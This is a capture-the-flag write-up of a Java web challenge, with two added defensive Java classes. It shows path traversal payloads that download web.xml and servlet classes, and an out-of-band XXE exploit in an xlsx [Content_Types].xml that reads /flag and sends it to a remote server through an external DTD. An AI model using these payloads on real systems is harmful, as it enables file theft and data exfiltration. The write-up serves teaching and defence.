# \[Qinglong Group] filejava

The challenge environment was broken, so the 500 responses could not be seen. There is a web.xml file disclosure here (path traversal through the download filename parameter):

```
filename=../../../web.xml
```

Using the servlet mappings in web.xml, download the class files:

```
filename=../../../classes/cn/abc/servlet/UploadServlet.class
filename=../../../classes/cn/abc/servlet/DownloadServlet.class
filename=../../../classes/cn/abc/servlet/ListFileServlet.class
```
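As an added defensive example (not code from the write-up or from the challenge's DownloadServlet), this is how the download side would refuse a filename such as `../../../web.xml`: the parameter is resolved against the upload directory, normalized, and rejected unless it still lies under that directory, with a second check after symlinks are followed. The upload directory, the method name `resolve` and the sample file names are assumptions for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

/**
 * Added example, not the challenge's DownloadServlet: map a user-supplied
 * "filename" parameter onto a file strictly inside one upload directory.
 */
public final class SafeDownloadPath {

    /**
     * Returns the real path of the requested file, or null when the request
     * should be refused (empty, escapes uploadDir, or is not a regular file).
     */
    public static Path resolve(Path uploadDir, String requested) throws IOException {
        if (requested == null || requested.trim().isEmpty()) {
            return null;
        }
        // Canonicalise the base once; it must exist.
        Path base = uploadDir.toRealPath();

        // resolve() keeps an absolute "requested" as-is and normalize() folds "..",
        // so "../../../web.xml" turns into a path that no longer starts with base.
        Path candidate = base.resolve(requested).normalize();
        if (!candidate.startsWith(base)) {
            return null;   // traversal attempt: log the raw parameter and the client
        }
        if (!Files.isRegularFile(candidate)) {
            return null;
        }
        // Follow symlinks and re-check so a link planted inside the upload
        // directory cannot point at web.xml or the classes directory.
        Path real = candidate.toRealPath();
        return real.startsWith(base) ? real : null;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a throwaway upload directory with one file in it.
        Path dir = Files.createTempDirectory("uploads");
        Files.write(dir.resolve("report.xlsx"), new byte[0]);

        String[] names = {"report.xlsx", "sub/../report.xlsx", "../../../web.xml", "/etc/passwd"};
        for (String name : names) {
            Path p = resolve(dir, name);
            System.out.println(name + " -> " + (p == null ? "REFUSED" : p));
        }
    }
}
```

The first two names resolve to the same file; the last two are refused. A rejected request here is also a useful detection signal: the raw `filename` value together with the client address is exactly what the write-up's traversal attempts would leave in the log.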

Among the downloaded classes, UploadServlet.class contains Excel file handling:

```
if (filename.startsWith("excel-") && "xlsx".equals(fileExtName)) {
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException var20) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        var20.printStackTrace();
    }
}
```

One annoying point is that up to here I still could not confirm the version number, but it was definitely a 2014 CVE that was used. The call chain: WorkbookFactory.create() enters the OPCPackage class, which creates a ZipPackage to handle the Excel file; this.getPartsImpl() reads the \[Content\_Types].xml file, and finally `Document xmlContentTypeDoc = xmlReader.read(in);` processes that file and triggers the XXE.
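The root cause above is an XML reader that still honours DTDs while parsing a package part taken straight from the upload. As an added defensive example (not code from the write-up or from Apache POI), the class below gates an uploaded .xlsx before it reaches WorkbookFactory.create(): it walks the zip, pulls out `[Content_Types].xml`, and parses it with a dom4j SAXReader configured to refuse any DOCTYPE and any external entity. A package whose content-types part carries a DOCTYPE like the one used in this challenge is rejected instead of resolved. The class and method names are assumptions; the feature URIs are the standard Xerces/SAX ones. `readAllBytes()` needs Java 9 or later.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

import org.dom4j.DocumentException;
import org.dom4j.io.SAXReader;
import org.xml.sax.SAXException;

/**
 * Added example, not code from the challenge or from Apache POI: check an uploaded
 * OOXML package's [Content_Types].xml with a reader that cannot process DTDs.
 */
public final class OoxmlUploadGuard {

    private static final String CONTENT_TYPES = "[Content_Types].xml";

    /** A dom4j SAXReader with DTD processing and external entity fetching switched off. */
    public static SAXReader hardenedReader() throws SAXException {
        SAXReader reader = new SAXReader();
        // Refusing the DOCTYPE outright is the decisive setting: the payload never gets parsed.
        reader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for parsers that accept a DOCTYPE but must not fetch anything.
        reader.setFeature("http://xml.org/sax/features/external-general-entities", false);
        reader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        reader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        return reader;
    }

    /**
     * Returns true when the package's [Content_Types].xml parses cleanly under the
     * hardened reader, false when the part is missing, is not well-formed XML, or
     * carries a DOCTYPE / entity declaration (the XXE case from this write-up).
     */
    public static boolean contentTypesIsClean(InputStream xlsx) throws IOException {
        try (ZipInputStream zip = new ZipInputStream(xlsx)) {
            ZipEntry entry;
            while ((entry = zip.getNextEntry()) != null) {
                if (!CONTENT_TYPES.equals(entry.getName())) {
                    continue;
                }
                byte[] xml = zip.readAllBytes();   // reads to the end of this entry only
                try {
                    hardenedReader().read(new ByteArrayInputStream(xml));
                    return true;
                } catch (DocumentException | SAXException e) {
                    // Worth logging: a DOCTYPE in a content-types part is a strong XXE signal.
                    return false;
                }
            }
        }
        return false;   // no [Content_Types].xml at all: not a valid OOXML package
    }
}
```

In the servlet this check has to run on a buffered copy (or on the file after it has been written to disk), because the request stream cannot be consumed twice and WorkbookFactory.create(in) still needs it. The check is a gate, not a replacement for the real fix, which is parsing package parts with a reader configured like the one above (or using a library version that does so by default).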

Exploitation approach:

Edit excel-123456.xlsx/\[Content\_Types].xml with 7-zip:

```
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % vps SYSTEM "http://xxx.xxx.xxx.xxx:8888/file.dtd">
%vps;
%all;
]>
```

Start a simple Python web server on port 8888 on the remote host, serving file.dtd:

```
<!ENTITY % all "<!ENTITY send SYSTEM 'http://xxx.xxx.xxx.xxx:8888/%file;'>">
```
